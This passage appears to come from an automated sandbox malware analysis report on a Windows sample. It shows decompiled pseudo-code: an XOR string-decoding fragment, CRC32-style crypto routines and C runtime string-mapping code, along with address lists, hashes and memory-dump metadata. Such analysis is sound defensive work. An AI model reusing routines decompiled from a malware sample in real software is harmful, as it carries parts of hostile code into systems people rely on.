				_v7 = _t68[0x1d] & 0x000000ff ^ 0x000000e9;
				_v6 = _t68[0x1e] & 0x000000ff ^ 0x0000006f;
				_v5 = _t68[0x1f] & 0x000000ff ^ 0x000000b4;
				_v4 = 0;
				E0040B350(_t72, _t137, _t138, _t138,  &_v36, 0x20);
				return _t138;
			}









































                                                                                                                                                                      0x00401654
                                                                                                                                                                      0x00401665
                                                                                                                                                                      0x0040166d
                                                                                                                                                                      0x0040167a
                                                                                                                                                                      0x00401682
                                                                                                                                                                      0x00401690
                                                                                                                                                                      0x00401698
                                                                                                                                                                      0x004016a6
                                                                                                                                                                      0x004016ae
                                                                                                                                                                      0x004016bc
                                                                                                                                                                      0x004016c4
                                                                                                                                                                      0x004016d2
                                                                                                                                                                      0x004016da
                                                                                                                                                                      0x004016e8
                                                                                                                                                                      0x004016f0
                                                                                                                                                                      0x004016fe
                                                                                                                                                                      0x00401706
                                                                                                                                                                      0x00401714
                                                                                                                                                                      0x0040171c
                                                                                                                                                                      0x0040172a
                                                                                                                                                                      0x00401732
                                                                                                                                                                      0x00401740
                                                                                                                                                                      0x00401748
                                                                                                                                                                      0x00401756
                                                                                                                                                                      0x0040175e
                                                                                                                                                                      0x0040176c
                                                                                                                                                                      0x00401774
                                                                                                                                                                      0x0040177c
                                                                                                                                                                      0x00401786
                                                                                                                                                                      0x0040178e
                                                                                                                                                                      0x0040179c
                                                                                                                                                                      0x004017a4
                                                                                                                                                                      0x004017ba
                                                                                                                                                                      0x004017be
                                                                                                                                                                      0x004017c2
                                                                                                                                                                      0x004017c7
                                                                                                                                                                      0x004017d5

                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.400990974.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.400990974.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.400990974.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.400990974.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Igv6ymbAA3.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: f84f8abda09efbfc4fc50908dec446613bf2f52d635c093d4d9c5e236f650133
                                                                                                                                                                      • Instruction ID: 39afabd8a370e1aacf823bb5b0eb141e0e266d105c364ee31248ba7b153c19f0
                                                                                                                                                                      • Opcode Fuzzy Hash: f84f8abda09efbfc4fc50908dec446613bf2f52d635c093d4d9c5e236f650133
                                                                                                                                                                      • Instruction Fuzzy Hash: 2851F94400D7E18EC716873A44E0AA7BFD10FAB115F4E9ACDA5E90B2E3C159C288DB77
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 024118B7 Relevance: .1, Instructions: 111COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.401518261.0000000002410000.00000040.00001000.00020000.00000000.sdmp, Offset: 02410000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2410000_Igv6ymbAA3.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: f84f8abda09efbfc4fc50908dec446613bf2f52d635c093d4d9c5e236f650133
                                                                                                                                                                      • Instruction ID: 35d551898d0d3905e3afb216901e9b3fcc7d88628c20d53563c0976352d6308f
                                                                                                                                                                      • Opcode Fuzzy Hash: f84f8abda09efbfc4fc50908dec446613bf2f52d635c093d4d9c5e236f650133
                                                                                                                                                                      • Instruction Fuzzy Hash: A151EA4400D7E18EC716873A44E0AA7BFD10FAB115F4E9ACDA5E90B2E3C159C288DB77
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00402F20 Relevance: .1, Instructions: 103COMMONCrypto
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                      			E00402F20(signed int _a4, signed int _a8, signed int _a12) {
				char _v128;
				char _v256;
				void* __ebx;
				signed int _t37;
				signed int _t42;
				signed int _t43;
				signed int _t48;
				signed int _t49;
				signed int _t52;
				signed int _t53;
				signed int _t54;
				signed int* _t55;
				signed int* _t56;
				signed int* _t57;
				signed int* _t58;
				signed int _t59;
				signed int _t60;
				void* _t62;
				void* _t64;
				signed int _t66;
				signed int _t68;
				void* _t69;

				_t69 =  &_v256;
				if(_a12 != 0) {
					_t52 = 1;
					_v256 = 0xedb88320;
					_t37 = 1;
					do {
						 *(_t69 + _t37 * 4) = _t52;
						_t37 = _t37 + 1;
						_t52 = _t52 + _t52;
						__eflags = _t37 - 0x20;
					} while (_t37 < 0x20);
					E00402EE0( &_v128,  &_v256);
					E00402EE0( &_v256,  &_v128);
					_t42 = _a4;
					do {
						_t62 = 0;
						do {
							_t53 =  *(_t69 + _t62 + 0xc);
							_t66 = 0;
							_t57 =  &_v256;
							__eflags = _t53;
							while(_t53 != 0) {
								__eflags = _t53 & 0x00000001;
								if((_t53 & 0x00000001) != 0) {
									_t66 = _t66 ^  *_t57;
									__eflags = _t66;
								}
								_t53 = _t53 >> 1;
								_t57 =  &(_t57[1]);
								__eflags = _t53;
							}
							 *(_t69 + _t62 + 0x8c) = _t66;
							_t62 = _t62 + 4;
							__eflags = _t62 - 0x80;
						} while (_t62 < 0x80);
						_t48 = _a12;
						__eflags = _t48 & 0x00000001;
						if(__eflags != 0) {
							_t60 = 0;
							_t56 =  &_v128;
							__eflags = _t42;
							while(__eflags != 0) {
								__eflags = _t42 & 0x00000001;
								if((_t42 & 0x00000001) != 0) {
									_t60 = _t60 ^  *_t56;
									__eflags = _t60;
								}
								_t42 = _t42 >> 1;
								_t56 =  &(_t56[1]);
								__eflags = _t42;
							}
							_t42 = _t60;
						}
						_t49 = _t48 >> 1;
						if(__eflags != 0) {
							_t64 = 0;
							do {
								_t54 =  *(_t69 + _t64 + 0x8c);
								_t68 = 0;
								_t58 =  &_v128;
								__eflags = _t54;
								while(_t54 != 0) {
									__eflags = _t54 & 0x00000001;
									if((_t54 & 0x00000001) != 0) {
										_t68 = _t68 ^  *_t58;
										__eflags = _t68;
									}
									_t54 = _t54 >> 1;
									_t58 =  &(_t58[1]);
									__eflags = _t54;
								}
								 *(_t69 + _t64 + 0xc) = _t68;
								_t64 = _t64 + 4;
								__eflags = _t64 - 0x80;
							} while (_t64 < 0x80);
							__eflags = _t49 & 0x00000001;
							if(__eflags != 0) {
								_t59 = 0;
								_t55 =  &_v256;
								__eflags = _t42;
								while(__eflags != 0) {
									__eflags = _t42 & 0x00000001;
									if((_t42 & 0x00000001) != 0) {
										_t59 = _t59 ^  *_t55;
										__eflags = _t59;
									}
									_t42 = _t42 >> 1;
									_t55 =  &(_t55[1]);
									__eflags = _t42;
								}
								_t42 = _t59;
							}
							goto L32;
						}
						break;
						L32:
						_a12 = _t49 >> 1;
					} while (__eflags != 0);
					_t43 = _t42 ^ _a8;
					__eflags = _t43;
					return _t43;
				} else {
					return _a4;
				}
			}

























                                                                                                                                                                      0x00402f20
                                                                                                                                                                      0x00402f2e
                                                                                                                                                                      0x00402f3e
                                                                                                                                                                      0x00402f43
                                                                                                                                                                      0x00402f4a
                                                                                                                                                                      0x00402f50
                                                                                                                                                                      0x00402f50
                                                                                                                                                                      0x00402f53
                                                                                                                                                                      0x00402f54
                                                                                                                                                                      0x00402f56
                                                                                                                                                                      0x00402f56
                                                                                                                                                                      0x00402f69
                                                                                                                                                                      0x00402f79
                                                                                                                                                                      0x00402f7e
                                                                                                                                                                      0x00402f85
                                                                                                                                                                      0x00402f85
                                                                                                                                                                      0x00402f90
                                                                                                                                                                      0x00402f90
                                                                                                                                                                      0x00402f94
                                                                                                                                                                      0x00402f96
                                                                                                                                                                      0x00402f9a
                                                                                                                                                                      0x00402f9c
                                                                                                                                                                      0x00402fa0
                                                                                                                                                                      0x00402fa3
                                                                                                                                                                      0x00402fa5
                                                                                                                                                                      0x00402fa5
                                                                                                                                                                      0x00402fa5
                                                                                                                                                                      0x00402fa7
                                                                                                                                                                      0x00402fa9
                                                                                                                                                                      0x00402fac
                                                                                                                                                                      0x00402fac
                                                                                                                                                                      0x00402fb0
                                                                                                                                                                      0x00402fb7
                                                                                                                                                                      0x00402fba
                                                                                                                                                                      0x00402fba
                                                                                                                                                                      0x00402fc2
                                                                                                                                                                      0x00402fc9
                                                                                                                                                                      0x00402fcc
                                                                                                                                                                      0x00402fce
                                                                                                                                                                      0x00402fd0
                                                                                                                                                                      0x00402fd7
                                                                                                                                                                      0x00402fd9
                                                                                                                                                                      0x00402fe0
                                                                                                                                                                      0x00402fe2
                                                                                                                                                                      0x00402fe4
                                                                                                                                                                      0x00402fe4
                                                                                                                                                                      0x00402fe4
                                                                                                                                                                      0x00402fe6
                                                                                                                                                                      0x00402fe8
                                                                                                                                                                      0x00402feb
                                                                                                                                                                      0x00402feb
                                                                                                                                                                      0x00402fef
                                                                                                                                                                      0x00402fef
                                                                                                                                                                      0x00402ff1
                                                                                                                                                                      0x00402ff3
                                                                                                                                                                      0x00402ff5
                                                                                                                                                                      0x00403000
                                                                                                                                                                      0x00403000
                                                                                                                                                                      0x00403007
                                                                                                                                                                      0x00403009
                                                                                                                                                                      0x00403010
                                                                                                                                                                      0x00403012
                                                                                                                                                                      0x00403014
                                                                                                                                                                      0x00403017
                                                                                                                                                                      0x00403019
                                                                                                                                                                      0x00403019
                                                                                                                                                                      0x00403019
                                                                                                                                                                      0x0040301b
                                                                                                                                                                      0x0040301d
                                                                                                                                                                      0x00403020
                                                                                                                                                                      0x00403020
                                                                                                                                                                      0x00403024
                                                                                                                                                                      0x00403028
                                                                                                                                                                      0x0040302b
                                                                                                                                                                      0x0040302b
                                                                                                                                                                      0x00403033
                                                                                                                                                                      0x00403036
                                                                                                                                                                      0x00403038
                                                                                                                                                                      0x0040303a
                                                                                                                                                                      0x0040303e
                                                                                                                                                                      0x00403040
                                                                                                                                                                      0x00403042
                                                                                                                                                                      0x00403044
                                                                                                                                                                      0x00403046
                                                                                                                                                                      0x00403046
                                                                                                                                                                      0x00403046
                                                                                                                                                                      0x00403048
                                                                                                                                                                      0x0040304a
                                                                                                                                                                      0x0040304d
                                                                                                                                                                      0x0040304d
                                                                                                                                                                      0x00403051
                                                                                                                                                                      0x00403051
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00403036
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00403053
                                                                                                                                                                      0x00403055
                                                                                                                                                                      0x00403055
                                                                                                                                                                      0x00403062
                                                                                                                                                                      0x00403062
                                                                                                                                                                      0x00403072
                                                                                                                                                                      0x00402f30
                                                                                                                                                                      0x00402f3d
                                                                                                                                                                      0x00402f3d

                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.400990974.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.400990974.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.400990974.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.400990974.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Igv6ymbAA3.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 5804b07f674ae3d268ec1438c7da71b35f3107e62f64f1f633515dfb68ee091a
                                                                                                                                                                      • Instruction ID: cff114a85fcb8f5deb46d81d22c4208fa3965af46b01a687ebeadebabb5a60ab
                                                                                                                                                                      • Opcode Fuzzy Hash: 5804b07f674ae3d268ec1438c7da71b35f3107e62f64f1f633515dfb68ee091a
                                                                                                                                                                      • Instruction Fuzzy Hash: 9A31D8302052028BE738CE19C954BEBB3B5AFC0349F44883ED986A73C4DABDD945D795
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 02413187 Relevance: .1, Instructions: 103COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.401518261.0000000002410000.00000040.00001000.00020000.00000000.sdmp, Offset: 02410000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2410000_Igv6ymbAA3.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 5804b07f674ae3d268ec1438c7da71b35f3107e62f64f1f633515dfb68ee091a
                                                                                                                                                                      • Instruction ID: 0b2e01b41d27fa31ed552d5d80babc94c9886a9a246e4eebc665bfd346b45443
                                                                                                                                                                      • Opcode Fuzzy Hash: 5804b07f674ae3d268ec1438c7da71b35f3107e62f64f1f633515dfb68ee091a
                                                                                                                                                                      • Instruction Fuzzy Hash: 1B31B4342043818BE73DDE29D890BEB7BA1AFC0308F48C5AEC99A8B740E774D445C751
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00402F89 Relevance: .1, Instructions: 77COMMONCrypto
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                      			E00402F89(signed int __eax, void* __edi, char _a12, char _a140, signed int _a276, signed int _a280) {
				signed int _t28;
				signed int _t30;
				signed int _t31;
				unsigned int _t34;
				unsigned int _t35;
				signed int* _t36;
				signed int* _t37;
				signed int* _t38;
				signed int* _t39;
				signed int _t40;
				signed int _t41;
				void* _t43;
				void* _t45;
				signed int _t46;
				signed int _t48;
				void* _t49;
				signed int _t60;
				signed int _t70;

				_t28 = __eax;
				while(1) {
					_t34 =  *(_t49 + _t43 + 0xc);
					_t46 = 0;
					_t38 =  &_a12;
					if(_t34 != 0) {
					}
					L3:
					do {
						if((_t34 & 0x00000001) != 0) {
							_t46 = _t46 ^  *_t38;
						}
						_t34 = _t34 >> 1;
						_t38 =  &(_t38[1]);
					} while (_t34 != 0);
					L7:
					 *(_t49 + _t43 + 0x8c) = _t46;
					_t43 = _t43 + 4;
					if(_t43 < 0x80) {
						do {
							_t34 =  *(_t49 + _t43 + 0xc);
							_t46 = 0;
							_t38 =  &_a12;
							if(_t34 != 0) {
							}
							goto L7;
						} while (_t43 < 0x80);
					}
					_t30 = _a280;
					if((_t30 & 0x00000001) != 0) {
						_t41 = 0;
						_t37 =  &_a140;
						if(_t28 != 0) {
							do {
								if((_t28 & 0x00000001) != 0) {
									_t41 = _t41 ^  *_t37;
								}
								_t28 = _t28 >> 1;
								_t37 =  &(_t37[1]);
								_t60 = _t28;
							} while (_t60 != 0);
						}
						_t28 = _t41;
					}
					_t31 = _t30 >> 1;
					if(_t60 != 0) {
						_t45 = 0;
						do {
							_t35 =  *(_t49 + _t45 + 0x8c);
							_t48 = 0;
							_t39 =  &_a140;
							while(_t35 != 0) {
								if((_t35 & 0x00000001) != 0) {
									_t48 = _t48 ^  *_t39;
								}
								_t35 = _t35 >> 1;
								_t39 =  &(_t39[1]);
							}
							 *(_t49 + _t45 + 0xc) = _t48;
							_t45 = _t45 + 4;
						} while (_t45 < 0x80);
						if((_t31 & 0x00000001) != 0) {
							_t40 = 0;
							_t36 =  &_a12;
							if(_t28 != 0) {
								do {
									if((_t28 & 0x00000001) != 0) {
										_t40 = _t40 ^  *_t36;
									}
									_t28 = _t28 >> 1;
									_t36 =  &(_t36[1]);
									_t70 = _t28;
								} while (_t70 != 0);
							}
							_t28 = _t40;
						}
						_a280 = _t31 >> 1;
						if(_t70 != 0) {
							_t43 = 0;
							continue;
						}
					}
					return _t28 ^ _a276;
				}
			}





















                                                                                                                                                                      0x00402f89
                                                                                                                                                                      0x00402f90
                                                                                                                                                                      0x00402f90
                                                                                                                                                                      0x00402f94
                                                                                                                                                                      0x00402f96
                                                                                                                                                                      0x00402f9c
                                                                                                                                                                      0x00402f9c
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00402fa0
                                                                                                                                                                      0x00402fa3
                                                                                                                                                                      0x00402fa5
                                                                                                                                                                      0x00402fa5
                                                                                                                                                                      0x00402fa7
                                                                                                                                                                      0x00402fa9
                                                                                                                                                                      0x00402fac
                                                                                                                                                                      0x00402fb0
                                                                                                                                                                      0x00402fb0
                                                                                                                                                                      0x00402fb7
                                                                                                                                                                      0x00402fc0
                                                                                                                                                                      0x00402f90
                                                                                                                                                                      0x00402f90
                                                                                                                                                                      0x00402f94
                                                                                                                                                                      0x00402f96
                                                                                                                                                                      0x00402f9c
                                                                                                                                                                      0x00402f9c
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00402f9c
                                                                                                                                                                      0x00402f90
                                                                                                                                                                      0x00402fc2
                                                                                                                                                                      0x00402fcc
                                                                                                                                                                      0x00402fce
                                                                                                                                                                      0x00402fd0
                                                                                                                                                                      0x00402fd9
                                                                                                                                                                      0x00402fe0
                                                                                                                                                                      0x00402fe2
                                                                                                                                                                      0x00402fe4
                                                                                                                                                                      0x00402fe4
                                                                                                                                                                      0x00402fe6
                                                                                                                                                                      0x00402fe8
                                                                                                                                                                      0x00402feb
                                                                                                                                                                      0x00402feb
                                                                                                                                                                      0x00402fe0
                                                                                                                                                                      0x00402fef
                                                                                                                                                                      0x00402fef
                                                                                                                                                                      0x00402ff1
                                                                                                                                                                      0x00402ff3
                                                                                                                                                                      0x00402ff5
                                                                                                                                                                      0x00403000
                                                                                                                                                                      0x00403000
                                                                                                                                                                      0x00403007
                                                                                                                                                                      0x00403009
                                                                                                                                                                      0x00403012
                                                                                                                                                                      0x00403017
                                                                                                                                                                      0x00403019
                                                                                                                                                                      0x00403019
                                                                                                                                                                      0x0040301b
                                                                                                                                                                      0x0040301d
                                                                                                                                                                      0x00403020
                                                                                                                                                                      0x00403024
                                                                                                                                                                      0x00403028
                                                                                                                                                                      0x0040302b
                                                                                                                                                                      0x00403036
                                                                                                                                                                      0x00403038
                                                                                                                                                                      0x0040303a
                                                                                                                                                                      0x00403040
                                                                                                                                                                      0x00403042
                                                                                                                                                                      0x00403044
                                                                                                                                                                      0x00403046
                                                                                                                                                                      0x00403046
                                                                                                                                                                      0x00403048
                                                                                                                                                                      0x0040304a
                                                                                                                                                                      0x0040304d
                                                                                                                                                                      0x0040304d
                                                                                                                                                                      0x00403042
                                                                                                                                                                      0x00403051
                                                                                                                                                                      0x00403051
                                                                                                                                                                      0x00403055
                                                                                                                                                                      0x0040305c
                                                                                                                                                                      0x00402f85
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00402f85
                                                                                                                                                                      0x0040305c
                                                                                                                                                                      0x00403072
                                                                                                                                                                      0x00403072

                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.400990974.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.400990974.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.400990974.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.400990974.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Igv6ymbAA3.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 9961543af999a1320c5b9d9b8c59a9b64f893fc8dbb42675723320a25693eab2
                                                                                                                                                                      • Instruction ID: 40597224e526abc728bb10992f322fa75c91b34d76fbbe6bc80328d1c420bfc2
                                                                                                                                                                      • Opcode Fuzzy Hash: 9961543af999a1320c5b9d9b8c59a9b64f893fc8dbb42675723320a25693eab2
                                                                                                                                                                      • Instruction Fuzzy Hash: F321923170520247EB68C929C9547ABB3A5ABC0389F48853EC986A73C8DAB9E941D785
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 024131F0 Relevance: .1, Instructions: 77COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.401518261.0000000002410000.00000040.00001000.00020000.00000000.sdmp, Offset: 02410000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2410000_Igv6ymbAA3.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 9961543af999a1320c5b9d9b8c59a9b64f893fc8dbb42675723320a25693eab2
                                                                                                                                                                      • Instruction ID: 0b2e3c00644135c081482d535e1b7095406d3cd72245b231ce0ed59373be1f02
                                                                                                                                                                      • Opcode Fuzzy Hash: 9961543af999a1320c5b9d9b8c59a9b64f893fc8dbb42675723320a25693eab2
                                                                                                                                                                      • Instruction Fuzzy Hash: 6621603170428187EB3CDD6AC891BEB7BA1ABC0648F48C5AECD968B740E775E445C651
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 02410D90 Relevance: .0, Instructions: 43COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.401518261.0000000002410000.00000040.00001000.00020000.00000000.sdmp, Offset: 02410000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2410000_Igv6ymbAA3.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                                                                                                                                      • Instruction ID: 441a9985b28c34078d79bd734ebbba5e127ede46740f0678d53c05c47d58bf19
                                                                                                                                                                      • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                                                                                                                                      • Instruction Fuzzy Hash: 6501A276B106048FDF21CF24C905BAB33E5EB86216F4554A6DD0A97385E774A9818B90
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00417081 Relevance: 31.8, APIs: 21, Instructions: 340COMMONLIBRARYCODE
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      C-Code - Quality: 86%
                                                                                                                                                                      			E00417081(short* __ecx, int _a4, signed int _a8, char* _a12, int _a16, char* _a20, int _a24, int _a28, intOrPtr _a32) {
				signed int _v8;
				int _v12;
				int _v16;
				int _v20;
				intOrPtr _v24;
				void* _v36;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t110;
				intOrPtr _t112;
				intOrPtr _t113;
				short* _t115;
				short* _t116;
				char* _t120;
				short* _t121;
				short* _t123;
				short* _t127;
				int _t128;
				short* _t141;
				signed int _t144;
				void* _t146;
				short* _t147;
				signed int _t150;
				short* _t153;
				char* _t157;
				int _t160;
				long _t162;
				signed int _t174;
				signed int _t178;
				signed int _t179;
				int _t182;
				short* _t184;
				signed int _t186;
				signed int _t188;
				short* _t189;
				int _t191;
				intOrPtr _t194;
				int _t207;

				_t110 =  *0x422234; // 0x96e20a3d
				_v8 = _t110 ^ _t188;
				_t184 = __ecx;
				_t194 =  *0x423e7c; // 0x1
				if(_t194 == 0) {
					_t182 = 1;
					if(LCMapStringW(0, 0x100, 0x420398, 1, 0, 0) == 0) {
						_t162 = GetLastError();
						__eflags = _t162 - 0x78;
						if(_t162 == 0x78) {
							 *0x423e7c = 2;
						}
					} else {
						 *0x423e7c = 1;
					}
				}
				if(_a16 <= 0) {
					L13:
					_t112 =  *0x423e7c; // 0x1
					if(_t112 == 2 || _t112 == 0) {
						_v16 = 0;
						_v20 = 0;
						__eflags = _a4;
						if(_a4 == 0) {
							_a4 =  *((intOrPtr*)( *_t184 + 0x14));
						}
						__eflags = _a28;
						if(_a28 == 0) {
							_a28 =  *((intOrPtr*)( *_t184 + 4));
						}
						_t113 = E00417A20(0, _t179, _t182, _t184, _a4);
						_v24 = _t113;
						__eflags = _t113 - 0xffffffff;
						if(_t113 != 0xffffffff) {
							__eflags = _t113 - _a28;
							if(_t113 == _a28) {
								_t184 = LCMapStringA(_a4, _a8, _a12, _a16, _a20, _a24);
								L78:
								__eflags = _v16;
								if(__eflags != 0) {
									_push(_v16);
									E0040B6B5(0, _t182, _t184, __eflags);
								}
								_t115 = _v20;
								__eflags = _t115;
								if(_t115 != 0) {
									__eflags = _a20 - _t115;
									if(__eflags != 0) {
										_push(_t115);
										E0040B6B5(0, _t182, _t184, __eflags);
									}
								}
								_t116 = _t184;
								goto L84;
							}
							_t120 = E00417A69(_t179, _a28, _t113, _a12,  &_a16, 0, 0);
							_t191 =  &(_t189[0xc]);
							_v16 = _t120;
							__eflags = _t120;
							if(_t120 == 0) {
								goto L58;
							}
							_t121 = LCMapStringA(_a4, _a8, _t120, _a16, 0, 0);
							_v12 = _t121;
							__eflags = _t121;
							if(__eflags != 0) {
								if(__eflags <= 0) {
									L71:
									_t182 = 0;
									__eflags = 0;
									L72:
									__eflags = _t182;
									if(_t182 == 0) {
										goto L62;
									}
									E0040BA30(_t182, _t182, 0, _v12);
									_t123 = LCMapStringA(_a4, _a8, _v16, _a16, _t182, _v12);
									_v12 = _t123;
									__eflags = _t123;
									if(_t123 != 0) {
										_t186 = E00417A69(_t179, _v24, _a28, _t182,  &_v12, _a20, _a24);
										_v20 = _t186;
										asm("sbb esi, esi");
										_t184 =  ~_t186 & _v12;
										__eflags = _t184;
									} else {
										_t184 = 0;
									}
									E004147AE(_t182);
									goto L78;
								}
								__eflags = _t121 - 0xffffffe0;
								if(_t121 > 0xffffffe0) {
									goto L71;
								}
								_t127 =  &(_t121[4]);
								__eflags = _t127 - 0x400;
								if(_t127 > 0x400) {
									_t128 = E0040B84D(0, _t179, _t182, _t127);
									__eflags = _t128;
									if(_t128 != 0) {
										 *_t128 = 0xdddd;
										_t128 = _t128 + 8;
										__eflags = _t128;
									}
									_t182 = _t128;
									goto L72;
								}
								E0040CFB0(_t127);
								_t182 = _t191;
								__eflags = _t182;
								if(_t182 == 0) {
									goto L62;
								}
								 *_t182 = 0xcccc;
								_t182 = _t182 + 8;
								goto L72;
							}
							L62:
							_t184 = 0;
							goto L78;
						} else {
							goto L58;
						}
					} else {
						if(_t112 != 1) {
							L58:
							_t116 = 0;
							L84:
							return E0040CE09(_t116, 0, _v8 ^ _t188, _t179, _t182, _t184);
						}
						_v12 = 0;
						if(_a28 == 0) {
							_a28 =  *((intOrPtr*)( *_t184 + 4));
						}
						_t184 = MultiByteToWideChar;
						_t182 = MultiByteToWideChar(_a28, 1 + (0 | _a32 != 0x00000000) * 8, _a12, _a16, 0, 0);
						_t207 = _t182;
						if(_t207 == 0) {
							goto L58;
						} else {
							if(_t207 <= 0) {
								L28:
								_v16 = 0;
								L29:
								if(_v16 == 0) {
									goto L58;
								}
								if(MultiByteToWideChar(_a28, 1, _a12, _a16, _v16, _t182) == 0) {
									L52:
									E004147AE(_v16);
									_t116 = _v12;
									goto L84;
								}
								_t184 = LCMapStringW;
								_t174 = LCMapStringW(_a4, _a8, _v16, _t182, 0, 0);
								_v12 = _t174;
								if(_t174 == 0) {
									goto L52;
								}
								if((_a8 & 0x00000400) == 0) {
									__eflags = _t174;
									if(_t174 <= 0) {
										L44:
										_t184 = 0;
										__eflags = 0;
										L45:
										__eflags = _t184;
										if(_t184 != 0) {
											_t141 = LCMapStringW(_a4, _a8, _v16, _t182, _t184, _v12);
											__eflags = _t141;
											if(_t141 != 0) {
												_push(0);
												_push(0);
												__eflags = _a24;
												if(_a24 != 0) {
													_push(_a24);
													_push(_a20);
												} else {
													_push(0);
													_push(0);
												}
												_v12 = WideCharToMultiByte(_a28, 0, _t184, _v12, ??, ??, ??, ??);
											}
											E004147AE(_t184);
										}
										goto L52;
									}
									_t144 = 0xffffffe0;
									_t179 = _t144 % _t174;
									__eflags = _t144 / _t174 - 2;
									if(_t144 / _t174 < 2) {
										goto L44;
									}
									_t52 = _t174 + 8; // 0x8
									_t146 = _t174 + _t52;
									__eflags = _t146 - 0x400;
									if(_t146 > 0x400) {
										_t147 = E0040B84D(0, _t179, _t182, _t146);
										__eflags = _t147;
										if(_t147 != 0) {
